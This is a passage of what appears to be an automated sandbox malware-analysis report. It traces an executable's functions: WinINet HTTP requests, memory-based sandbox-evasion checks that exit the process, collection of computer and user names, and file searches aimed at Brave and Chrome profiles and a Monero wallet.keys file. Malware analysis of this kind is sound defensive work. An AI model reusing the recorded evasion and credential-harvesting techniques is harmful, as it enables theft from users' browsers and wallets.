                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: c58a09cc7291d1342527e99eba393d436c63c6e023bf74cd8f8376d59ce1411d
                                    • Instruction ID: 4bdefc1e7312b91c0c1fa47f389ac24aa3adf9b9f87d4602114f47f25c41e181
                                    • Opcode Fuzzy Hash: c58a09cc7291d1342527e99eba393d436c63c6e023bf74cd8f8376d59ce1411d
                                    • Instruction Fuzzy Hash: 22213EB1D00208ABDF14DFA5EC45ADD7B74FF44320F108225FA25A72D0EB746A0ADB91
                                    Function 00FF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE6280: InternetOpenA.WININET(01000DFE,00000001,00000000,00000000,00000000), ref: 00FE62E1
                                      • Part of subcall function 00FE6280: StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6303
                                      • Part of subcall function 00FE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6335
                                      • Part of subcall function 00FE6280: HttpOpenRequestA.WININET(00000000,GET,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE6385
                                      • Part of subcall function 00FE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FE63BF
                                      • Part of subcall function 00FE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE63D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: f0b295cec911536133e3c274cac68f9e7601eaecc0c09dd94386dd7d2e33d5cf
                                    • Instruction ID: e6deae7eabbc082de55c34dd30483bef49e71130df81d0b2e80a1538502154a7
                                    • Opcode Fuzzy Hash: f0b295cec911536133e3c274cac68f9e7601eaecc0c09dd94386dd7d2e33d5cf
                                    • Instruction Fuzzy Hash: 59111F7190014CA6DB14FF61DD92AFD7338AF50340F408158FA1E4A5B2EF78AB15E691
                                    Function 00FE1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1261 fe1220-fe1247 call ff89b0 GlobalMemoryStatusEx 1264 fe1249-fe1271 call ffda00 * 2 1261->1264 1265 fe1273-fe127a 1261->1265 1267 fe1281-fe1285 1264->1267 1265->1267 1269 fe129a-fe129d 1267->1269 1270 fe1287 1267->1270 1272 fe1289-fe1290 1270->1272 1273 fe1292-fe1294 ExitProcess 1270->1273 1272->1269 1272->1273
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FE123E
                                    • ExitProcess.KERNEL32 ref: 00FE1294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: cc5f31e876ea645e2d5d4fbe706b3f459d0b572293927dee6369e324695ebd95
                                    • Instruction ID: 005adeb87daeb0a6f627e493a80d75cd5897f9d617eb9729e6e8236472496a2c
                                    • Opcode Fuzzy Hash: cc5f31e876ea645e2d5d4fbe706b3f459d0b572293927dee6369e324695ebd95
                                    • Instruction Fuzzy Hash: 9C0162B0D40348BADF20DFD1DC49BADB778BF14701F208044E705B62D0D7785545A759
                                    Function 00FE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FE112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FE1132
                                    • ExitProcess.KERNEL32 ref: 00FE1143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 898b88869c18123b71b12a315f4bf3b83fbd9d041ce96be45ebf257d5e548275
                                    • Instruction ID: d229c6cd90d560a6b0ac056065774c36df2e673752de99b8b70f4a263a0773ec
                                    • Opcode Fuzzy Hash: 898b88869c18123b71b12a315f4bf3b83fbd9d041ce96be45ebf257d5e548275
                                    • Instruction Fuzzy Hash: 4DE0E670945348FBE7306FA1AC0EB0D7678AB04B11F105154F709B79C4D6F926409799
                                    Function 00FE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FE10B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FE10F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: a22d32733dda8d74c3b2ad1897e9add762bd9659f39babb8c96fefd08df3d7f0
                                    • Instruction ID: d17ef3122111f0f84690bc988344c5d2bbcb019aa5eb996c0affa197d10f0c91
                                    • Opcode Fuzzy Hash: a22d32733dda8d74c3b2ad1897e9add762bd9659f39babb8c96fefd08df3d7f0
                                    • Instruction Fuzzy Hash: 33F0E971641248BBE7249AA5AC49FBEB7D8E705B15F301444F604E3280D5719E00DB54
                                    Function 00FE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7910
                                      • Part of subcall function 00FF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7917
                                      • Part of subcall function 00FF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FF792F
                                      • Part of subcall function 00FF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE11B7), ref: 00FF7880
                                      • Part of subcall function 00FF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7887
                                      • Part of subcall function 00FF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FF789F
                                    • ExitProcess.KERNEL32 ref: 00FE11C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: fe1bfd29561cff5776e312153252c95c93a043d9a8a432293cf34eef1b40c3fa
                                    • Instruction ID: fdf2fe17394f44f2cd4c45402f7b5d51ed2fd9ba0879d2ccf56ef63ccf75f4e9
                                    • Opcode Fuzzy Hash: fe1bfd29561cff5776e312153252c95c93a043d9a8a432293cf34eef1b40c3fa
                                    • Instruction Fuzzy Hash: C7E0ECB5D1430966CE247AB2BC0AB3E329CAF14795F141424FB05E3A12FA2DE811A669

                                    Non-executed Functions

                                    Function 00FF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FF38CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF38E3
                                    • lstrcat.KERNEL32(?,?), ref: 00FF3935
                                    • StrCmpCA.SHLWAPI(?,01000F70), ref: 00FF3947
                                    • StrCmpCA.SHLWAPI(?,01000F74), ref: 00FF395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF3C67
                                    • FindClose.KERNEL32(000000FF), ref: 00FF3C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 5838b5a94a1763b76d990bfa62659b07ba32f468611bd3e4266e979727e9b111
                                    • Instruction ID: 47128fa9cf42d01a99c67fbb2d199f571483ee6e754af72fbf4dc87f137e1735
                                    • Opcode Fuzzy Hash: 5838b5a94a1763b76d990bfa62659b07ba32f468611bd3e4266e979727e9b111
                                    • Instruction Fuzzy Hash: C8A11DB2A00218ABDB34DF64DC89FFE7378BF48700F044588E60A96545EB759B84DF62
                                    Function 00FEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,01000B32,01000B2B,00000000,?,?,?,010013F4,01000B2A), ref: 00FEBEF5
                                    • StrCmpCA.SHLWAPI(?,010013F8), ref: 00FEBF4D
                                    • StrCmpCA.SHLWAPI(?,010013FC), ref: 00FEBF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEC7BF
                                    • FindClose.KERNEL32(000000FF), ref: 00FEC7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 37ddc66d14d3ae9e8470f153199efdfe326b185599403f3810cca652a656e0b6
                                    • Instruction ID: d636b484d7a4026720b0628c22be71119e492bab4d0116f9241037912df609c8
                                    • Opcode Fuzzy Hash: 37ddc66d14d3ae9e8470f153199efdfe326b185599403f3810cca652a656e0b6
                                    • Instruction Fuzzy Hash: 8A4256B290010CA7DB14FB60DC96EFD737DAF44300F408558FA0A961A5EF78AB49DB92
                                    Function 00FF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FF492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF4943
                                    • StrCmpCA.SHLWAPI(?,01000FDC), ref: 00FF4971
                                    • StrCmpCA.SHLWAPI(?,01000FE0), ref: 00FF4987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF4B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00FF4B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 08fca140e273cc451b0f0949b45674272a6ee2592074cf8f80ea44190e05ddc1
                                    • Instruction ID: 214c224c242bdc9ff6bfd9bf2117cde403cc38d70ef55d1c4c4f57792b55b781
                                    • Opcode Fuzzy Hash: 08fca140e273cc451b0f0949b45674272a6ee2592074cf8f80ea44190e05ddc1
                                    • Instruction Fuzzy Hash: CF612FB2900218ABCB34EFA0EC49EFE7378BF48700F044598F64A96545EB75AB459F91
                                    Function 00FF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FF4580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF4587
                                    • wsprintfA.USER32 ref: 00FF45A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF45BD
                                    • StrCmpCA.SHLWAPI(?,01000FC4), ref: 00FF45EB
                                    • StrCmpCA.SHLWAPI(?,01000FC8), ref: 00FF4601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF468B
                                    • FindClose.KERNEL32(000000FF), ref: 00FF46A0
                                    • lstrcat.KERNEL32(?,0180EAC0), ref: 00FF46C5
                                    • lstrcat.KERNEL32(?,0180D948), ref: 00FF46D8
                                    • lstrlen.KERNEL32(?), ref: 00FF46E5
                                    • lstrlen.KERNEL32(?), ref: 00FF46F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 19735a3d45afc1a0fc0806795f700095c219e4d126222b3a166b3a6ed619e841
                                    • Instruction ID: de517c73258bdb02252e35dc2c5dec324836631ff75f17d8a56414eb08393f21
                                    • Opcode Fuzzy Hash: 19735a3d45afc1a0fc0806795f700095c219e4d126222b3a166b3a6ed619e841
                                    • Instruction Fuzzy Hash: 5B5142B690021CABCB34EF70DC89FFE7378AF58700F404598F60A96594EB749A859F91
                                    Function 00FF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FF3EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF3EDA
                                    • StrCmpCA.SHLWAPI(?,01000FAC), ref: 00FF3F08
                                    • StrCmpCA.SHLWAPI(?,01000FB0), ref: 00FF3F1E
